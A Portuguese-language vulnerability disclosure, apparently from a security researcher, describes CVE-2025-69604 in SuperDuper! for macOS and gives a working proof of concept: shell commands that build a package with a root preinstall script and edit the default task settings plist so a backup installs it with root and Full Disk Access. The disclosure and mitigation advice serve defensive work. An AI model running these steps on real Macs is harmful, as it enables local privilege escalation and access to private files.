
Exploração de prova de conceito para CVE-2025-69604, demonstrando escalada de privilégio via instalação de pacote malicioso em tarefas de backup SuperDuper no macOS.
Esta vulnerabilidade é semelhante à descrita em CVE-2025-61229 – um atacante pode editar o modelo de tarefa para fazer com que as tarefas de backup do SuperDuper instalem um pacote arbitrário. O pacote pode então executar scripts de shell como usuário root e com o mais alto nível de acesso à privacidade (acesso total ao disco).
Pontuação CVSS 3.1: a pontuação NVD está pendente.
Para evitar esta vulnerabilidade, exclua o aplicativo SuperDuper! ou aplique a atualização 3.12.
Esta análise de exploração e prova de conceito é fornecida apenas para fins educacionais. Use-a por sua conta e risco.
Na minha análise anterior da vulnerabilidade CVE-2025-61229 do SuperDuper, descobri que o modelo de Configurações Padrão do SuperDuper ainda era inerentemente inseguro mesmo depois que o desenvolvedor corrigiu essa vulnerabilidade na atualização 3.11 do SuperDuper. Essa atualização corrigiu apenas a vulnerabilidade específica detalhada na CVE-2025-61229, mas não resolveu o fato de que um atacante poderia modificar o modelo de tarefa padrão. Infelizmente, o modelo de tarefa inclui funcionalidade para instalar pacotes, então um atacante pode modificar o modelo de tarefa para especificar um pacote que possa instalar software ou executar scripts de shell como usuário root e com acesso total ao disco.
O desenvolvedor mitigou esta vulnerabilidade removendo a funcionalidade de "instalar pacote". Novamente, o modelo de configurações de tarefa ainda pode ser modificado por um atacante, e o desenvolvedor chegou a indicar que isso não poderia ser resolvido sem incomodar o usuário (ou seja, exigir que o usuário se autentique toda vez que a tarefa for modificada). Portanto, parece que o modelo de tarefa padrão continuará vulnerável a modificações no futuro previsível, porque o desenvolvedor não conseguiu encontrar outra forma de torná-lo mais seguro.
Minha conclusão anterior merece ser repetida: privilégios de root e Acesso Total ao Disco são os maiores privilégios que um software pode obter no macOS. Qualquer desenvolvedor que solicite esses privilégios deveria escrever software que siga os princípios modernos de design de segurança e as melhores práticas. Esta vulnerabilidade, bem como as expostas em CVE-2025-57489 e CVE-2025-61228, e até mesmo a admissão do próprio desenvolvedor de que esses problemas persistem há 22 anos, demonstram que o SuperDuper não foi projetado para ser um produto seguro e não recebeu melhorias regulares de design ao longo de 22 anos para aderir às melhores práticas modernas.
Esta vulnerabilidade é explorada de maneira quase exatamente igual à CVE-2025-61229, então, em grande parte, remeto à minha análise anterior dessa vulnerabilidade aqui. A seguinte prova de conceito demonstra a exploração com a versão 3.11 do SuperDuper:
mkdir -p /tmp/scripts
cd ~; export home=`pwd`; export user=`whoami`
printf '#!/bin/bash\n' > /tmp/scripts/preinstall
printf "ls -l $home/Desktop > /Library/private_data.txt\n" >> /tmp/scripts/preinstall
chmod a+x /tmp/scripts/preinstall
pkgbuild --identifier com.gray.sdexploit --nopayload --scripts /tmp/scripts /tmp/attack.pkg
cd ~/'Library/Application Support/SuperDuper!/Saved Settings/.Default Settings.sdsp'
cp 'Session Settings.sdss' Settings.plist
defaults write "`pwd`"/Settings.plist SDshouldInstallPackage -bool YES
defaults write "`pwd`"/Settings.plist SDinstallerPackage /tmp/attack.pkg
cp Settings.plist 'Session Settings.sdss'
Depois de concluir esses comandos, basta executar um backup com as configurações padrão e o attack.pkg será instalado com privilégios de root e acesso total ao disco. O resultado final é um arquivo chamado "private_data" em /Library (ou seja, gravável apenas por root) que contém uma listagem da sua pasta Desktop (ou seja, que só pode ser acessada por código em execução com acesso total ao disco).